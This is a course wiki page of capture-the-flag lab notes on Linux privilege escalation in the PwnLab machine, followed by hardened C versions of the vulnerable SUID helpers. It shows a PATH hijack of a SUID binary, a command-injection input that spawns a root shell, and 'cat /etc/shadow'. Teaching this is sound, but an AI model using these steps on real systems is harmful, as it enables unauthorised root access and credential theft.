Linux Privilege Escalation - Paiet/SEC-335 GitHub Wiki

  • Linux Priv Esc (After gaining reverse shell in PwnLab)

    • Look for low-hanging fruit
      • uname -a (Maybe an OS priv esc exploit)
        • searchsploit linux priv local
      • Look for exploits in third-party software
      • Misconfigured permissions from cron jobs or scripts
  • START LAB

  • whoami

    • www-data
  • We need to change users so that we can get more access, then root access

    • Luckily we have a list of users
      ls -al /home
      drwxr-x---  2 john john 4096 Mar 17  2016 john
      drwxr-x---  2 kane kane 4096 Nov 15 14:13 kane
      drwxr-x---  2 kent kent 4096 Mar 17  2016 kent
      drwxr-x---  2 mike mike 4096 Mar 17  2016 mike

  • Some of these users look familiar (the same as the mysql users)
  • You don't think their credentials work here do ya? :)

  • Unfortunately su didn't work

    • We get this error

      su: must be run from a terminal

  • Gotta spawn a bash terminal; luckily that is quickly done with python

    python -c 'import pty;pty.spawn("/bin/bash")'

  • Prompt changes to: www-data@pwnlab:/$

    • I can now log in as kent and kane, but not mike.
    • Kent's home dir has nothing of interest
    • Kane's home dir has an executable that runs as Mike. Let's check it out.
      • rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike
      • strings msgmike (nothing here)
      • ./msgmike
        • cat: /home/mike/msg.txt: No such file or directory
      • Looks like this little script calls "cat" without a full path, which lets us mess with the $PATH variable so that it runs our own "cat" and spawns a shell as Mike
        • Remember the msgmike script runs as Mike because of the SUID bit, so when the script runs our version of cat, Mike's account spawns a shell (because that's what our cat does)
      • Trying to append Kane's home dir to the $PATH variable
        • export PATH=$PATH:/home/kane
        • Run ./msgmike
        • no joy (the real cat in /bin is still found first, since an appended dir is searched last)
      • Copy the full $PATH value, then set $PATH to /home/kane only
        • echo $PATH (copy output for later use)
        • PATH=/home/kane
        • ./msgmike
        • New shell spawned
        • Reset $PATH using copied output
          • PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
          • This must be done, or no commands will work without full paths
        • Run our handy python script to spawn a bash terminal
          • python -c 'import pty;pty.spawn("/bin/bash")'
        • whoami
          • We are Mike
  • More Priv Esc: To Root and beyond

  • Move into /home/mike and list all files and perms

    • One file of interest
      • msg2root
      • ./msg2root
      • Message for root: hi root ("hi root" is user input)
      • hi root
      • mike@pwnlab:/home/mike$
      • Permissions reveal that this script runs as root with SUID set
      • strings msg2root
      • interesting string found
        • Message for root:
        • /bin/echo %s >> /root/messages.txt
          • Looks like this script appends to a file in root's home dir
          • Maybe a command injection attack here
          • Using a ; you can string commands together, since the message ends up inside a shell command line
            • ./msg2root
            • Message for root: rooted; /bin/sh
            • rooted; /bin/sh
            • rooted
            • # whoami
            • root
  • We now have a root shell!

  • Proof

    • cd /root
  • also

    • cat /etc/shadow
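Both escalations on this page come from SUID helpers that hand user-controlled input (the $PATH lookup for "cat" in msgmike, the message text in msg2root) to a shell. As an added example, not the lab's own code, here are hardened C versions of what those two helpers do: the file is read and the message appended with plain libc calls, so no shell is involved and neither $PATH nor a ';' in the message changes what runs. The function names and the /tmp self-check are assumptions made for this example.

```c
#define _POSIX_C_SOURCE 200809L
/* Added example (not the lab's code): hardened versions of what msgmike and
 * msg2root do. The lab binaries ran "cat" through a shell with no full path and
 * built "/bin/echo %s >> /root/messages.txt" from user input; these use libc
 * calls only, so neither $PATH nor a ';' in the message changes what runs. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Copy a file to `out` directly: no external "cat", no PATH lookup at all. */
int cat_file(const char *path, FILE *out) {
    FILE *in = fopen(path, "r");
    if (!in) return -1;
    char buf[4096];
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, in)) > 0)
        fwrite(buf, 1, n, out);
    fclose(in);
    return 0;
}

/* Append one line with open(2)/write(2): the message is data, never a command. */
int append_message(const char *path, const char *msg) {
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT, 0600);
    if (fd < 0) return -1;
    size_t len = strlen(msg);
    int ok = write(fd, msg, len) == (ssize_t)len && write(fd, "\n", 1) == 1;
    close(fd);
    return ok ? 0 : -1;
}

/* Self-check (assumed helper): append the page's injection string to a temp file
 * and confirm it lands verbatim, i.e. ';' and '/bin/sh' were stored, not run. */
int demo_roundtrip(void) {
    char path[] = "/tmp/msgXXXXXX";          /* constructed temp file, not /root */
    int fd = mkstemp(path);
    if (fd < 0) return 0;
    close(fd);
    const char *msg = "rooted; /bin/sh";     /* the exact input used on this page */
    if (append_message(path, msg) != 0) return 0;
    char got[64] = {0};
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    size_t n = fread(got, 1, sizeof got - 1, f);
    fclose(f);
    unlink(path);
    return n == strlen(msg) + 1 && memcmp(got, msg, strlen(msg)) == 0 && got[n - 1] == '\n';
}
```

A real SUID helper would also hard-code its target path and reset the environment before doing anything, but the core fix is the same: never pass untrusted input through a shell.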